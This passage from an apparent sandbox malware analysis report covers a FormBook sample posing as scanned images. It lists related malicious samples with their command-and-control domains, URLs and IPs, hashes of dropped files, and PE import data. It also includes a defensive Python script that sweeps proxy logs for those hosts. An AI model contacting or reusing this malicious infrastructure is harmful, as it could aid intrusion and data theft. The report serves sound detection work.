  gUJak0onLk.elf | malicious | Unknown | kensingtonconfectionery.com/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: www.mqmsqkw.lol
  Scanned Docs from Emnes Metal Sdn Bhd_.exe | malicious | FormBook | 116.213.43.190
  Payrol list.exe | malicious | FormBook | 116.213.43.190
  New Order.exe | malicious | FormBook, PureLog Stealer | 116.213.43.190
  BL.exe | malicious | FormBook | 116.213.43.190
  payment advice.exe | malicious | FormBook | 116.213.43.190
  MV SHUHA QUEEN II.exe | malicious | FormBook | 116.213.43.190
  AuT5pFGTFw.exe | malicious | FormBook | 116.213.43.190
  new order.exe | malicious | FormBook | 116.213.43.190
  SHUYOU #U65b0#U6307#U4ee4 PO-2301010 03-07-2024.pdf.exe | malicious | FormBook | 116.213.43.190
  nJ8mJTmMf0.exe | malicious | FormBook | 116.213.43.190
Match: www.lfghtko.lol
  Scanned Docs from Emnes Metal Sdn Bhd_.exe | malicious | FormBook | 116.213.43.190
  PTT request form.exe | malicious | FormBook | 116.213.43.190
  PTT requested quotation.exe | malicious | FormBook | 116.213.43.190
  D02984-KP-002011.exe | malicious | FormBook | 116.213.43.190
  REQN#1010135038.exe | malicious | FormBook | 116.213.43.190
  PTT quotation form.exe | malicious | FormBook | 116.213.43.190
  Required quotations data list.exe | malicious | FormBook | 116.213.43.190
  SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.20907.8920.exe | malicious | FormBook | 116.213.43.190
  HILCORP ENERGY REQUESTS.zip | malicious | FormBook | 116.213.43.190
Match: kmdne.ajunsdfancsda.com
  Scanned Docs from Emnes Metal Sdn Bhd_.exe | malicious | FormBook | 216.83.33.140
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: AMAZON-02 (US)
  PO TIYEY078K.exe | malicious | FormBook, PureLog Stealer | 76.223.67.189
  file.exe | malicious | Unknown | 52.222.236.23
  APS-0240226.exe | malicious | FormBook | 18.183.3.45
  http://vbfii.pgslotmx.com/4lErLl15833GMQN1411zilkbmrmpx14462UVBCFIXAXTJVAYQ286RNBY17492g17 | malicious | Unknown | 54.76.183.106
  http://vztel.pgslotmx.com/4LzXXV15833BwEh1411pqqjcszogu14462TQIECUFXUJQCTZS286RSWC17492j17 | malicious | Unknown | 54.71.206.39
  http://nxejt.polluxcastor.top | malicious | Unknown | 18.244.18.32
  DzgLfcsXop.exe | malicious | Unknown | 3.165.136.99
  file.exe | malicious | Unknown | 52.222.236.48
  SecuriteInfo.com.Win32.DropperX-gen.16703.29630.exe | malicious | LummaC | 185.166.143.49
  SecuriteInfo.com.Win64.DropperX-gen.20063.4917.exe | malicious | Stealc | 185.166.143.50
Match: ACENS_AS Spain Hosting housing and VPN services (ES)
  Scanned Docs from Emnes Metal Sdn Bhd_.exe | malicious | FormBook | 217.116.0.191
  b2bXo6vmDm.exe | malicious | SystemBC | 217.116.5.231
  5CxmQXL0LD.exe | malicious | SystemBC | 82.194.91.200
  HSBCscancopy-invoice778483-payment87476MT103.exe | malicious | FormBook | 217.116.0.191
  Request for Quotation - (SM Store San Mateo).exe | malicious | FormBook | 217.116.0.191
  D02984-KP-002011.exe | malicious | FormBook | 217.116.0.191
  REQN#1010135038.exe | malicious | FormBook | 217.116.0.191
  pismo1A 12.06.2024.exe | malicious | FormBook | 217.116.0.191
  RFQ for Maintenance usering for Sabratha Project.exe | malicious | FormBook | 217.116.0.191
  CFV20240600121.exe | malicious | FormBook | 217.116.0.191
Match: VNPT-AS-VN VNPT Corp (VN)
  Vinyl Graphics Document.xlsx | malicious | EvilProxy, HTMLPhisher | 203.161.38.167
  Vinyl Graphics Document.xlsx | malicious | Unknown | 203.161.38.167
  Udspecialiser45.exe | malicious | FormBook, GuLoader | 203.161.49.193
  qEW7hMvyV7.exe | malicious | FormBook | 203.161.49.193
  Pro#U015bba o Wycena - Strony 4-6.vbs | malicious | FormBook, GuLoader | 203.161.46.205
  Payment Advice - Advice Ref[BIBBC2023189].exe | malicious | FormBook, PureLog Stealer | 203.161.46.205
  SecuriteInfo.com.Win32.MalwareX-gen.27733.18864.exe | malicious | Unknown | 103.255.237.239
  DHL 0009485777.exe | malicious | FormBook, PureLog Stealer | 203.161.42.161
  Remittance advice.exe | malicious | FormBook | 203.161.42.158
  Shipping document_pdf.exe | malicious | FormBook | 203.161.41.190
                                                      No context
                                                      No context
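The Context column of the related-sample tables above shows the same hosts (www.lecoinsa.net, www.rtrpodcast.online, www.stellardaysigning.com) reused by several FormBook samples under different four-character directories, and the C2 URL in the URL table carries a short query parameter (dZo=). The following is an added example, not part of the Joe Sandbox report or its tooling: it turns the context entries copied from the tables above into host and directory indicators and sweeps proxy-log lines for traffic to those hosts, flagging a known host even when the directory is one this report has not seen. The proxy log lines and their format are constructed for the example and are not from the analysed machine; the HIT/NEW-DIR labels are the example's own.

```python
"""Host/directory indicators from the related-sample context column above,
swept against proxy logs.

Added example for this report; not Joe Sandbox code. CONTEXTS is copied from
the tables above; PROXY_LOG lines are constructed for the example.
"""
import re
from urllib.parse import urlsplit

# Context entries as printed in the IP / domain / ASN match tables above.
CONTEXTS = [
    "www.lecoinsa.net/7ffx/",
    "www.lecoinsa.net/i4bw/",
    "www.lecoinsa.net/zd4t/",
    "www.lecoinsa.net/xu8t/",
    "www.rtrpodcast.online/l2ei/",
    "www.rtrpodcast.online/g3rq/",
    "www.stellardaysigning.com/xb5p/",
    "www.captoriot.com/pn4e/?KfTD=TVbisx4cAYlWi1QWASjGfV1crgLBR8JtvsCp22pQc6hP3WdU+qw/hnDLngBsYyNwe7SkJXu6Y4ccrmt/HgV2tQEycSxLeHUr9w==&pd=8k02Xq71ReL2NgiL",
    "116.213.43.190",  # domain-match rows give only the resolved IP
]

# Every FormBook context above uses a single four-character directory.
DIR_RE = re.compile(r"^/([a-z0-9]{4})/")
URL_RE = re.compile(r"https?://\S+")


def parse_context(entry: str) -> dict:
    """Split a context entry (bare host/dir/ or full URL) into host, dir and query-parameter name."""
    if "://" not in entry:
        entry = "http://" + entry
    parts = urlsplit(entry)
    m = DIR_RE.match(parts.path)
    return {
        "host": parts.hostname,
        "dir": m.group(1) if m else None,
        "param": parts.query.split("=", 1)[0] if parts.query else None,
    }


def build_indicators(contexts) -> dict:
    """Map each host (or bare IP) to the set of directories seen for it."""
    indicators = {}
    for entry in contexts:
        info = parse_context(entry)
        dirs = indicators.setdefault(info["host"], set())
        if info["dir"]:
            dirs.add(info["dir"])
    return indicators


def sweep(log_lines, indicators) -> list:
    """Return one hit per log line whose URL host is a known indicator host.

    known_dir is False when the directory is new for that host; the tables above
    show each host serving several directories, so such lines still deserve a look.
    """
    hits = []
    for line in log_lines:
        m = URL_RE.search(line)
        if not m:
            continue
        info = parse_context(m.group(0))
        known = indicators.get(info["host"])
        if known is None:
            continue
        hits.append({"host": info["host"], "dir": info["dir"],
                     "param": info["param"], "known_dir": info["dir"] in known})
    return hits


# Constructed proxy log lines (assumed format: time, client, method, URL, status).
PROXY_LOG = [
    "2024-08-18T16:25:10Z 10.0.0.5 GET http://www.lecoinsa.net/7ffx/?dZo=bNQ0 200",
    "2024-08-18T16:25:11Z 10.0.0.5 GET http://www.rtrpodcast.online/q9zz/ 404",
    "2024-08-18T16:25:12Z 10.0.0.7 GET https://www.example.com/index.html 200",
    "2024-08-18T16:25:13Z 10.0.0.5 POST http://www.lecoinsa.net/7ffx/ 200",
]

if __name__ == "__main__":
    for hit in sweep(PROXY_LOG, build_indicators(CONTEXTS)):
        label = "HIT" if hit["known_dir"] else "NEW-DIR"
        print(f"{label:8} {hit['host']} dir={hit['dir']} param={hit['param']}")
```

Matching on the host rather than the full path is deliberate: the tables show www.lecoinsa.net alone serving /7ffx/, /i4bw/, /zd4t/ and /xu8t/ to different samples, so a path-exact indicator would miss the next directory that host is given.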
Process: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe
File Type: data
Category: dropped
Size (bytes): 271872
Entropy (8bit): 7.993386307633134
Encrypted: true
SSDEEP: 6144:velP3FogzISzT+rzY+eHZWnk62FfP5zatkFy1vDJ:Gl/ygkSQeW+ZP5uvd
MD5: E2ABE3AF2B1EFA391F592E0DB4914937
SHA1: EA3CC692BF07DBFE764F074BEF9B2CA0D944EE85
SHA-256: 5AE2213AB114B3942CA41ACE0DE1518F9937165D293CE0B5E5960A59CF9ECFB8
SHA-512: B598EB4E0B41C465972A70CAD5444EE7E686B34205519B78E619FE3532F91CC5C4B89C8B3D4C2A2F5D5F730371D83F52D0F376E49294A8967CC955B87AA21263
Malicious: false
Reputation: low
                                                      Preview:uk...YI70..]....i.IJ...bMO...0PUZT7Q5TUTIIB81JNGYI70PUZT7Q5.UTIG].?J.N.h.1..{._8Ft%&&.0Y\j-&7'XDp7?tE$[t<:i..k.'!#<g:=ZqZT7Q5TU-H@..Q-.z9...02.N...n53.S..v. .S...i:3..\7=i)..81JNGYI7`.UZ.6P5E.M.IB81JNGY.72Q^[_7Q!PUTIIB81JNWMI70@UZT.U5TU.IIR81JLGYO70PUZT7W5TUTIIB8.NNG[I70PUZV7..TUDIIR81JNWYI'0PUZT7A5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7.A1- IIB\#NNGII70DQZT'Q5TUTIIB81JNGYi700UZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70P
Process: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe
File Type: data
Category: dropped
Size (bytes): 271872
Entropy (8bit): 7.993386307633134
Encrypted: true
SSDEEP: 6144:velP3FogzISzT+rzY+eHZWnk62FfP5zatkFy1vDJ:Gl/ygkSQeW+ZP5uvd
MD5: E2ABE3AF2B1EFA391F592E0DB4914937
SHA1: EA3CC692BF07DBFE764F074BEF9B2CA0D944EE85
SHA-256: 5AE2213AB114B3942CA41ACE0DE1518F9937165D293CE0B5E5960A59CF9ECFB8
SHA-512: B598EB4E0B41C465972A70CAD5444EE7E686B34205519B78E619FE3532F91CC5C4B89C8B3D4C2A2F5D5F730371D83F52D0F376E49294A8967CC955B87AA21263
Malicious: false
Reputation: low
                                                      Preview:uk...YI70..]....i.IJ...bMO...0PUZT7Q5TUTIIB81JNGYI70PUZT7Q5.UTIG].?J.N.h.1..{._8Ft%&&.0Y\j-&7'XDp7?tE$[t<:i..k.'!#<g:=ZqZT7Q5TU-H@..Q-.z9...02.N...n53.S..v. .S...i:3..\7=i)..81JNGYI7`.UZ.6P5E.M.IB81JNGY.72Q^[_7Q!PUTIIB81JNWMI70@UZT.U5TU.IIR81JLGYO70PUZT7W5TUTIIB8.NNG[I70PUZV7..TUDIIR81JNWYI'0PUZT7A5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7.A1- IIB\#NNGII70DQZT'Q5TUTIIB81JNGYi700UZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70PUZT7Q5TUTIIB81JNGYI70P
Process: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe
File Type: data
Category: dropped
Size (bytes): 9762
Entropy (8bit): 7.637630929214253
Encrypted: false
SSDEEP: 192:CZIUd0H8VoRVvrmhY2npAP3CYlDU8fcoNS05/kNZA1CCp7EXaWoB:Yd0HtRVH4qCDxkD/VCIEqWoB
MD5: EA5DF5C3FCD63E7A0F0D0992D12FAE38
SHA1: 356A1A3ADB677378C1675532CED7B10910E11D16
SHA-256: 3ADB99C43F41CAC29EA0D7E5613A4C3162946761C339B0451F34A76B3629C8C9
SHA-512: 5DF23B27314181832A4C493AA4D62DB44F9FA5C32183519D99C3F9AEE81D9640131A9DF37A3843F70CC7C83F59B8D688627BC0BFC3653D38ED86C1F468CB0607
Malicious: false
Reputation: low
                                                      Preview:EA06..p..^..y..e.L..[-.e4....y..sd.N,....e8.N.si..md..&..]....9...K........|.0.o..d..,......:..@..;.Y'sP.......4.Z..o;..6.`.o.p..Y@.....g.;..f.P..Y@...N..i.........;......r.'Sy...c ....Ac.H.....(.F.3<..Y..6...4.d........x..n....Bv.....X. 0....+$.r...Y..5_..l.....5_..t.U..`5_....U...5_..d.U...5\..>30..N.^.c.Z..o8.z..s8......@.....s...G. /Z.N'`.....jv....r.u....$.../.s:...g G_T......l.>_.......zo7.........s@.......@...........`.M..`... ...e...@..8.'.6.Y.{>K$..c.M.`..Y'.._..t......>K #G.d..3|vY..G.6.Yf.8_..oe..i|vY....e.h.,.0......-..9.M..kE...Ng.P;..:.N..P.L..6...f..+(.ffvI...8.N.....f.@.E...Y....3.i.....N@......vi.....P.....2p....<d....,vf........N.!+(.'&`....,fs4...I.......r.4.X...c3.4.ih.Y.!...Gf.....,f.;.... .#9.....c.P........t.h.s.....,vj...$..t.L....40.....f....N.s....4..@.6.-..p..S.=..4...SP.N...;7.`..;.M.....o:.....c.p..Y.s.wx.....vp........E....N.y6....p.c3.5..6..b.!....F ...@B5e.Mgs........vr......fV[5.v...B3p....;:.X...c.NA..0........g@....&.<..e...
Process: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe
File Type: FGDC-STD-001-1998
Category: dropped
Size (bytes): 28674
Entropy (8bit): 3.5799572889089
Encrypted: false
SSDEEP: 384:gAQKCZbwwQ4/6BEsM6IYj84F5Fdu/euMcL1R22qO6FsVWfGbLph1juTJOtHtiP:PQKeIksMMIM7yX22GFs+GbLph1jXtAP
MD5: 998E89F2198CD4BC35DC6E234B79C27E
SHA1: 6CE9AFB3032C3C76689B34758B8F7CEAD44A1423
SHA-256: 73D8935C5FF8CFF761BB5988CEFE41C184A656C1C41C11013C6161E0A11020CB
SHA-512: A504D03D1BCBAF98B5611E6B46DFE54A254290E69B46DEF252FAE532CB809E7DD914ECB0C73557A83071278832A59503EFA43CAA099C27B8D80A4E7502EDE371
Malicious: false
Reputation: low
                                                      Preview:2z77:dge:3geee2422227879d:8d22222288:;67:6d;8722222288:;6f:8dc9422222288:;77::d:8g22222288:;67:cd;8722222288:;6f:edc8e22222288:;77:gd:5522222288:;67;2d;5422222288:;6f;4dc4g22222288:;77;6d:8622222288:;67;8d;8e22222288:;6f;:dc8e22222288:;77;c55e288:;67;ed;8g22222288:;:f66hhhhhhdc9622222288:;;768hhhhhhd:8622222288:;:76:hhhhhhd;8e22222288:;:f6chhhhhhdc8e22222288:;;76ehhhhhhd:4g22222288:;:76ghhhhhhd;8622222288:;:f72hhhhhhdc8e22222288:;;774hhhhhhd:8e22222288:;:776hhhhhh55e;88:;:f78hhhhhhdc9722222288:;77f2d:9522222288:;67f4d;8722222288:;6ff6dc9422222288:;77f8d:5522222288:;67f:d;5422222288:;6ffcdc4g22222288:;77fed:8622222288:;67fgd;8e22222288:;6fg2dc8e22222288:;77g455e288:;67g6d;8322222288:;:f8:hhhhhhdc8622222288:;;78chhhhhhd:9822222288:;:78ehhhhhhd;8322222288:;:f8ghhhhhhdc9222222288:;;792hhhhhhd:8;22222288:;:794hhhhhhd;5522222288:;:f96hhhhhhdc5422222288:;;798hhhhhhd:4g22222288:;:79:hhhhhhd;8622222288:;:f9chhhhhhdc8e22222288:;;79ehhhhhhd:8e22222288:;:79ghhhhhh55e;88:;6f:2dc9522222288:;77c2d:8:
Process: C:\Windows\SysWOW64\schtasks.exe
File Type: Unknown
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.1221538113908904
Encrypted: false
SSDEEP: 192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
MD5: C1AE02DC8BFF5DD65491BF71C0B740A7
SHA1: 6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
SHA-256: CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
SHA-512: 01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
Malicious: false
Reputation: moderate, very likely benign file
                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Entropy (8bit):7.207748478140611
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe
                                                      File size:1'211'904 bytes
                                                      MD5:58077f7b69ca6e33ec9a13f1b2b53c02
                                                      SHA1:09c02cdd3a29100c0398c4a2192bfbfef34fb94c
                                                      SHA256:758ad60c19d53019939eeb1ac2502931f5f6c17ae9184372f8f30efac42f90c1
                                                      SHA512:a5739b504ee8ab35745fb30ccd665ad79da5d1825481c9ca2f2016b1e5b5cafddfe47759c6d7db6a63c486580a9267ba34bd22856a65c1ef95a54455bdafc3c3
                                                      SSDEEP:24576:iAHnh+eWsN3skA4RV1Hom2KXMmHabm7/wNlusWwN4nGf5:lh+ZkldoPK8YabmENJWwinS
                                                      TLSH:7845BD0273D6D036FFAA92739B6AB20156BC7D290133852F13982DB9BD701B1267D663
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                                                      Icon Hash:6142420142183038
                                                      Entrypoint:0x42800a
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x66B96D84 [Mon Aug 12 02:03:48 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:5
                                                      OS Version Minor:1
                                                      File Version Major:5
                                                      File Version Minor:1
                                                      Subsystem Version Major:5
                                                      Subsystem Version Minor:1
                                                      Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                      Instruction
                                                      call 00007FCC1D14173Dh
                                                      jmp 00007FCC1D1344F4h
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      push edi
                                                      push esi
                                                      mov esi, dword ptr [esp+10h]
                                                      mov ecx, dword ptr [esp+14h]
                                                      mov edi, dword ptr [esp+0Ch]
                                                      mov eax, ecx
                                                      mov edx, ecx
                                                      add eax, esi
                                                      cmp edi, esi
                                                      jbe 00007FCC1D13467Ah
                                                      cmp edi, eax
                                                      jc 00007FCC1D1349DEh
                                                      bt dword ptr [004C41FCh], 01h
                                                      jnc 00007FCC1D134679h
                                                      rep movsb
                                                      jmp 00007FCC1D13498Ch
                                                      cmp ecx, 00000080h
                                                      jc 00007FCC1D134844h
                                                      mov eax, edi
                                                      xor eax, esi
                                                      test eax, 0000000Fh
                                                      jne 00007FCC1D134680h
                                                      bt dword ptr [004BF324h], 01h
                                                      jc 00007FCC1D134B50h
                                                      bt dword ptr [004C41FCh], 00000000h
                                                      jnc 00007FCC1D13481Dh
                                                      test edi, 00000003h
                                                      jne 00007FCC1D13482Eh
                                                      test esi, 00000003h
                                                      jne 00007FCC1D13480Dh
                                                      bt edi, 02h
                                                      jnc 00007FCC1D13467Fh
                                                      mov eax, dword ptr [esi]
                                                      sub ecx, 04h
                                                      lea esi, dword ptr [esi+04h]
                                                      mov dword ptr [edi], eax
                                                      lea edi, dword ptr [edi+04h]
                                                      bt edi, 03h
                                                      jnc 00007FCC1D134683h
                                                      movq xmm1, qword ptr [esi]
                                                      sub ecx, 08h
                                                      lea esi, dword ptr [esi+08h]
                                                      movq qword ptr [edi], xmm1
                                                      lea edi, dword ptr [edi+08h]
                                                      test esi, 00000007h
                                                      je 00007FCC1D1346D5h
                                                      bt esi, 03h
                                                      Programming Language:
                                                      • [ASM] VS2013 build 21005
                                                      • [ C ] VS2013 build 21005
                                                      • [C++] VS2013 build 21005
                                                      • [ C ] VS2008 SP1 build 30729
                                                      • [IMP] VS2008 SP1 build 30729
                                                      • [ASM] VS2013 UPD5 build 40629
                                                      • [RES] VS2013 build 21005
                                                      • [LNK] VS2013 UPD5 build 40629
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbc0cc | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc8000 | 0x5d624 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x126000 | 0x7134 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4b50 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dfdd | 0x8e000 | 310e36668512d53489c005622bb1b4a9 | False | 0.5735602580325704 | data | 6.675248351711057 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2fd8e | 0x2fe00 | 748cf1ab2605ce1fd72d53d912abb68f | False | 0.32828818537859006 | data | 5.763244005758284 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbf000 | 0x8f74 | 0x5200 | aae9601d920f07080bdfadf43dfeff12 | False | 0.1017530487804878 | data | 1.1963819235530628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc8000 | 0x5d624 | 0x5d800 | dc23ce9c4a2692103d7446f0434e7c32 | False | 0.9699145638368984 | data | 7.969322527303809 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x126000 | 0x7134 | 0x7200 | f04128ad0f87f42830e4a6cdbc38c719 | False | 0.7617530153508771 | data | 6.783955557128661 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc8458 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc8580 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc86a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc87d0 | 0x1024 | Device independent bitmap graphic, 32 x 62 x 32, image size 3968, resolution 4724 x 4724 px/m | English | Great Britain | 0.23426911907066797
RT_MENU | 0xc97f4 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xc9844 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xc9dd8 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xca464 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xca8f4 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xcaef0 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcb54c | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcb9b4 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcbb0c | 0x595fc | data | | | 1.000330532457741
RT_GROUP_ICON | 0x125108 | 0x14 | data | English | Great Britain | 1.2
RT_GROUP_ICON | 0x12511c | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x125130 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x125144 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x125158 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x125234 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
